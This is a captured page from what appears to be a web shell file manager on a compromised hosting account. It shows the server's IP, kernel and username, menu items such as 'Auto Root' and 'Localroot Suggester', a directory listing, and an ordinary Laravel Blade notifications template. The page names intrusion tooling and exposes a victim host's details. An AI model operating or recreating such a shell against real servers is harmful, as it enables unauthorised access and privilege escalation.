Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
data /
core /
resources /
views /
admin /
Delete
Unzip
Name
Size
Permission
Date
Action
auth
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
deposit
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
email_template
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
extension
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
frontend
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
gateway
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
gateway_manual
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
language
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
layouts
[ DIR ]
drwxr-xr-x
2022-08-16 09:47
partials
[ DIR ]
drwxr-xr-x
2022-08-17 08:25
ptc
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
reports
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
setting
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
sms_template
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
subscriber
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
support
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
users
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
withdraw
[ DIR ]
drwxr-xr-x
2021-10-03 08:51
dashboard.blade.php
24.91
KB
-rw-r--r--
2021-10-03 08:49
info.blade.php
2.36
KB
-rw-r--r--
2021-10-03 08:49
notifications.blade.php
1007
B
-rw-r--r--
2021-10-03 08:49
password.blade.php
3.88
KB
-rw-r--r--
2021-10-03 08:49
plans.blade.php
8.07
KB
-rw-r--r--
2022-09-01 15:31
profile.blade.php
4.85
KB
-rw-r--r--
2021-10-03 08:49
referrals.blade.php
8.13
KB
-rw-r--r--
2021-10-03 08:49
reports.blade.php
2.57
KB
-rw-r--r--
2021-10-03 08:49
Save
Rename
@extends('admin.layouts.app') @section('panel') <div class="notify__area"> @foreach($notifications as $notification) <a class="notify__item @if($notification->read_status == 0) unread--notification @endif" href="{{ route('admin.notification.read',$notification->id) }}"> <div class="notify__thumb bg--primary"> <img src="{{ getImage(imagePath()['profile']['user']['path'].'/'.@$notification->user->image,imagePath()['profile']['user']['size'])}}"> </div> <div class="notify__content"> <h6 class="title">{{ __($notification->title) }}</h6> <span class="date"><i class="las la-clock"></i> {{ $notification->created_at->diffForHumans() }}</span> </div> </a> @endforeach {{ paginateLinks($notifications) }} </div> @endsection @push('breadcrumb-plugins') <a href="{{ route('admin.notifications.readAll') }}" class="btn btn--primary">@lang('Mark all as read')</a> @endpush